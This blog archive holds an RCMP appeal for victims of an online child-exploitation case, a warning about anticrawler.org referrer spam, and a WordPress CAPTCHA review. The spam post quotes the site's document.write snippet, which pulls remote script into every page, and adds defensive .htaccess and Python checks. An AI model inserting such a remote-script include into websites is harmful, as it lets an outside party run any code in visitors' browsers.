Category Archives: Abuse

Local man tricks up to 2000 boys into exposing themselves online

I don’t think kids are getting the message: anything that you would not be comfortable for your mother to see should never be allowed onto any digital device, from explicit text messages to embarrassing pictures, never. I don’t know if the effect on this predator’s victims has been as fatal as in this previous story, where a number of kids lost their lives.

The Local RCMP have issued this video calling for victims to come forward.

 

 

From the RCMP Website here

The New Brunswick RCMP’s Internet Child Exploitation Unit is seeking the public’s help to identify victims of a man who had been sexually exploiting boys online from at least January 2012 until the fall of 2014.

Investigators have determined that this man was luring boys online by pretending to be a teenaged girl. The investigation indicates the possible victims are as young as 10 and up to 16 years old and may not even be aware they have been victimized. Police have charged a 24-year-old Moncton man, who cannot be named because of a court ordered publication ban, with several sex offences.

In addition to those offences, the investigation has shown the man contacted boys through live video chats on various social media sites. He used a video of a teenaged girl that appeared to be live and convinced the boys to undress and initiate sex acts which he then taped and distributed via the Internet. One chat website he used frequently was Omegle.com, a site that requires no username where people can chat with strangers from all over the world.

Investigators have determined that there could be as many as 2000 victims living in Canada, the United States, United Kingdom, the Netherlands, Australia and Russia and possibly elsewhere.  Police are asking anyone who may have been in contact with this man via video chat or email to contact their local police or call the Royal Canadian Mounted Police in New Brunswick at 1-506-452-3405 or by email at jdivice.divjueei@rcmp-grc.gc.ca

This man’s known online user names and email addresses are listed below.

Video Chat Names

  • Skype: Veronika.Maylae
  • Vichatter: Veronika69

Facebook Account

  • Vero May (www.facebook.com/vero.may.3950)

Email Addresses

  • boiyavi@hotmail.com
  • revolboy@hotmail.com
  • tigerjack@hotmail.com

“We know it may be difficult for victims and/or their families to come forward but their information is very important to the investigation and could help prevent similar crimes by online predators,” says Sgt. Jean Marc Paré of the New Brunswick RCMP.  “Police want to be able to speak to as many victims as possible to assist with the investigation.”

The RCMP investigation into this case in New Brunswick started in the fall of 2014 as the result of information uncovered by York Regional Police during an investigation entitled Project Hydra.

The RCMP in New Brunswick has released a video about this investigation on social media and is asking the public to view it and then share it via their social media channels in order to reach as many potential victims as possible.

Anyone with information on these crimes can report their information anonymously through Crime Stoppers at www.crimenb.ca or by calling 1-800-222-TIPS (8477).

Contact Information

Cst. Jullie Rogers-Marsh
Media Relations Officers
RCMP in New Brunswick
506-452-4252

 

 

 

AntiCrawler, referrer spam turned nasty

AntiCrawler, referrer spam turned nasty, asking you to add potentially malicious code to your own site.

Although this is by far not the most popular blog, I do like to look in each day to check up on things, and I often see referrer spam. I always check out what they are up to. It is a form of advertising: they show up in your site logs and analytics, and of course you are going to check who’s sending you traffic. It’s nearly always “SEO” or marketing companies offering you more traffic; you can guess the quality of traffic they would provide just by looking at their advertising method.

But the referral spam that the anticrawler.org bot left a couple of entries of yesterday is different. When I click through to it, there is a single page, ironically telling you that if you “Put this JS to all pages of your website and you’ll never see BAD bots and crawlers”. The idea that some technology would “ping” crawlers to inform them not to crawl your site is ludicrous. The script calls to include a PHP file, anticrawler.php, which will load from their site:

<script>
document.write('<script src="//anticrawler.org/plugin/anticrawler.php?u=' + encodeURIComponent(document.location.href) + '"></' + 'script>');
</script>

When I open anticrawler.php, all it does is print to the screen this totally benign line of commented-out code, which does absolutely nothing:

//Pinging bots

But tomorrow it could be anything, as they can now run any code they like in your pages, in the browser of every visitor. I can only guess what the end game is here, maybe they haven’t decided yet: inject spam, add a backdoor to your site or server, launch attacks on other sites, or just infect your site’s visitors with some other malware.
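A way to check your own pages for this kind of include, as an added example that is not code from the original post: it lists every host that serves script to a page, including a tag that only exists as text inside a document.write() string, as in the snippet above. The sample page, the first-party host example.org and the function name are assumptions made for the illustration.

```python
import re
from urllib.parse import urlparse

# A <script ... src=...> whose URL names a host, either as a real tag or as
# text inside a string handed to document.write().
SCRIPT_SRC = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*["']?((?:https?:)?//[^"'\s>]+)""", re.I)

def external_script_hosts(html, own_hosts):
    """Return the sorted hosts that serve script to this page and are not ours."""
    own = {h.lower() for h in own_hosts}
    found = set()
    for url in SCRIPT_SRC.findall(html):
        # urlparse reads "//host/path" as a URL without a scheme, so the
        # protocol-relative form used by the snippet still yields a host.
        host = (urlparse(url).hostname or "").lower()
        if host and host not in own and not any(host.endswith("." + o) for o in own):
            found.add(host)
    return sorted(found)

# Constructed page: one first-party script, plus the include from the post.
PAGE = """<html><head>
<script src="https://www.example.org/js/site.js"></script>
<script>
document.write('<script src="//anticrawler.org/plugin/anticrawler.php?u=' + encodeURIComponent(document.location.href) + '"></' + 'script>');
</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for host in external_script_hosts(PAGE, ["example.org"]):
        print("script loaded from a host outside your control:", host)
```

Any host this reports can change what it serves at any time, so each one should be a party you have chosen to trust.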

Of course you should not trust anyone using referral spam. The entries in your stats and analytics themselves are not harmful, but they can be annoying in that they spoil the accuracy of the data you are collecting. If you want to block AntiCrawler and other referrer spam, you can add a list to your .htaccess file in this format:

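RewriteEngine on
# Options +FollowSymlinks
# Each condition tests the Referer header; [NC] ignores case, [OR] chains to the next condition
RewriteCond %{HTTP_REFERER} http://anticrawler\.org [NC,OR]
RewriteCond %{HTTP_REFERER} ready-to-go\.com [NC,OR]
RewriteCond %{HTTP_REFERER} seamalt\.com
# Answer matching requests with 403 Forbidden
RewriteRule .* - [F]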

Notice that all but the last entry have [NC,OR] at the end of the line, and the \ before the .org is required so that the dot is matched literally.
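As the list grows, the rules can be generated rather than typed, which avoids a missing space, an unescaped dot or a stray [OR] on the last line. The following is an added example, not code from the original post; it goes slightly beyond the format above by anchoring each pattern so that it matches http or https and any subdomain, and the function names are assumptions.

```python
import re

DOMAIN_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$")

def referer_pattern(domain):
    """Regex for a Referer on `domain` or any subdomain, over http or https."""
    domain = domain.strip().lower()
    if not DOMAIN_RE.match(domain):
        raise ValueError("not a plain host name: %r" % domain)
    # Escape each dot: unescaped, "." matches any character.
    return r"^https?://([^/]+\.)?" + domain.replace(".", r"\.") + r"(/|:|$)"

def build_rules(domains):
    """Return the .htaccess lines for a list of spam referrer domains."""
    patterns = [referer_pattern(d) for d in dict.fromkeys(domains)]
    if not patterns:
        return []
    lines = ["RewriteEngine on"]
    for i, p in enumerate(patterns):
        # Every condition but the last is chained to the next one with OR.
        flags = "[NC]" if i == len(patterns) - 1 else "[NC,OR]"
        lines.append("RewriteCond %{HTTP_REFERER} " + p + " " + flags)
    lines.append("RewriteRule .* - [F]")
    return lines

def is_blocked(referer, domains):
    """Apply the same patterns to one Referer value, ignoring case like [NC]."""
    return any(re.search(referer_pattern(d), referer, re.I) for d in domains)

SPAM = ["anticrawler.org", "ready-to-go.com", "seamalt.com"]  # domains from the post

if __name__ == "__main__":
    print("\n".join(build_rules(SPAM)))
    # Constructed Referer values, not taken from real logs.
    for ref in ["http://anticrawler.org/", "https://WWW.SeaMalt.com/page",
                "http://anticrawlerXorg.example/", "https://example.com/?q=seamalt.com"]:
        print(is_blocked(ref, SPAM), ref)
```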

Blog Spammers and which CAPTCHA, 5 reviewed

CAPTCHA, standing for “Completely Automated Public Turing test to tell Computers and Humans Apart”, has been around since 2000, so it was already fairly well developed when the bots targeting blogs, guest books and wikis, which are the main targets of those peddling their commercial junk, surfaced a couple of years later.


Over the years I have used many, both as a consumer and as a developer. On projects the choice is usually left to me. What’s happened a couple of times is that a default-installation CMS comes with a CAPTCHA pre-installed to protect forms, normally a comment, contact or registration form; this will work fine for a couple of weeks, then when the bots find the page, they will inundate it with abuse.

Some forms, like the talent application on ImageFolio, are fairly resistant to abuse by design, as they are asking questions which will mean very little to a spammer bot; the page name “become_a_model” will mean nothing to them. I have, though, left a very simple CAPTCHA there in case I need to improve on the feature in the future, and it won’t be too much of a shock to clients.

Quite often the CAPTCHA systems need to be tightened up by increasing complexity; if one is still not doing its job, replace it. I wish that wasn’t the case, but the bot developers are well funded, and the abuse must continue: the sales of backlinks on fiverr.com, with prices as low as 1500 for $5, have to be fulfilled somehow.

My biggest problem with these spammers these days is not the actual spam; on blog installations it’s the sheer number of fake accounts they create. The actual spam is caught by a spam filter, but the abusers insist on creating accounts even though I often allow commenting on sites without the need to log in (anonymous commenting).

Anyway, here’s a short write-up on a few CAPTCHAs I’m using on WordPress.

The criteria I will measure them by are the number of false positives (people mis-entering) compared to the ability of spammers to circumvent them (spam comments or accounts).

BotDetect: they have a very wide variety of platforms supported, with free and paid options, and the users of their library are impressive, including many international Government departments. I haven’t opted yet for the paid version; the only advantage would be the removal of the branding, which clients have not complained about. Classic, fairly simple to read distorted text puzzle; I am guessing what gives it the edge on others are the changing backgrounds that challenge the bots.

Setup is not simple, requiring not just the installation using WordPress’s add plugin feature, but also the need to upload the libraries to the wp-content folder and move to another directory. But once it’s there, it’s very simple with options to protect Login, Comments, User Registration and Lost Passwords, and the expected control of character numbers and CAPTCHA size. There is also an option to disable audio, I would suggest this is removed, I can’t think of an instance where you would want to exclude the visually impaired. Support for feedback and contact forms is missing, but I am told by the developer they are working on this feature now.

SweetCaptcha: most CMS platforms supported, single free no-strings offering, not the normal distorted text, but a drag and drop puzzle to solve. I have heard of some problems on certain devices when completing the puzzle, but have not seen the evidence and was unable to replicate; even my normally fussy “noscript” Firefox and antique Windows phone were happy with it. A unique fun design with some amusing themes which you can switch between; it can be applied to any input form on a CMS from what I can tell. I have not seen a bot able to solve the puzzle, but I have seen a lot of users get it wrong first and second time. I have no idea why, maybe a language thing; in this case maybe I don’t know what Victor’s favorite colour is? I’d suggest they research their puzzles a bit more and add an audio option, which I think is essential and is noticeably missing.

UPDATE 9th June 2015: SweetCaptcha has been serving malware via their script, I am sorry to have recommended them, use at your own risk.

reCAPTCHA: made and used by Google, offered for free and fully open source. It’s bundled in a number of plugins for WordPress but not as a plugin itself, and is fairly easy to use, only needing the input of an API key to get going after installing whatever plugin it came bundled with. I believe for a long time this was the best available; I have seen bots bypass it, and quite quickly the developers improved it. But again, people do have a lot of problems reading the distorted text, to the point of giving up on it and resorting to the audio when they obviously have good eyesight. There is a variety of options, but not on puzzle strength, layout of the widget and colour / style options available. There is a large community of developers integrating reCAPTCHA into systems, which is the reason both that abusers occasionally circumvent it and that updates to the code are quickly developed.

Captcha by BestWeb: available stand-alone, free and paid, and bundled with many of Best Web Soft’s other popular plugins, which are all very simple to use. Its simple mathematical challenges I personally find easier than any other, nearly second nature. I think the bots, unless the text numbers are enabled (one, two..), don’t see this CAPTCHA as much of a challenge; I have tested this on some heavily targeted sites and it was next to useless in stopping the 100+ fake signups a day they were suffering. That said, many people seem happy with it. The fact that it is bundled with so many other plugins leaves me a little surprised that they haven’t improved on it.

SI CAPTCHA: I won’t go into too much detail. For a long time it was good at what it did, stopping spam and the associated accounts: traditional distorted text, more readable (to me anyway) than most, with few fails. Easy to install, but it does little to stop abuse now. I did hear that maybe spammers had found another way of bypassing the puzzle, not actually solving it, maybe even looking for forms that use this CAPTCHA solution. I’ve been unable to find a link to that discussion now, so can’t be certain; will update if I find it.

Asirra: an interesting open source project sponsored by Microsoft that I watched develop for a few years, which leveraged humans’ unique ability and enjoyment of separating pictures of kittens and puppies. Sadly, after many attempts at bringing it to the masses, Asirra’s potential doesn’t seem to have been realized. I am sure themed versions would be very popular if they were applied to the subject matter of the site, say male and female models for a model agency.

Summary

For me, at the moment BotDetect, although still in beta, has the lowest false positives (people mis-entering) compared to spammers able to abuse it, and is very suitable for high volume traffic sites; I am anxiously waiting on their contact form support. For a light traffic site that is not being targeted and that can get away with the unique look, you should go for SweetCaptcha, and for any that can’t, sorry, I can’t really recommend one. Of course you may be forced to use the solution supplied with your plugin (contact forms etc.), or maybe you should choose your plugin based on the CAPTCHA it employs.

Keep in mind that the developers may be fixing any shortcomings I have mentioned whilst I type, or that I am praising a solution that could be circumvented tomorrow. Read the current reviews, and be prepared to switch out, maybe very quickly, which may not be so easy if the CAPTCHA is tied to another plugin you are dependent on. Feedback on this article is very welcome, of course not by spammers.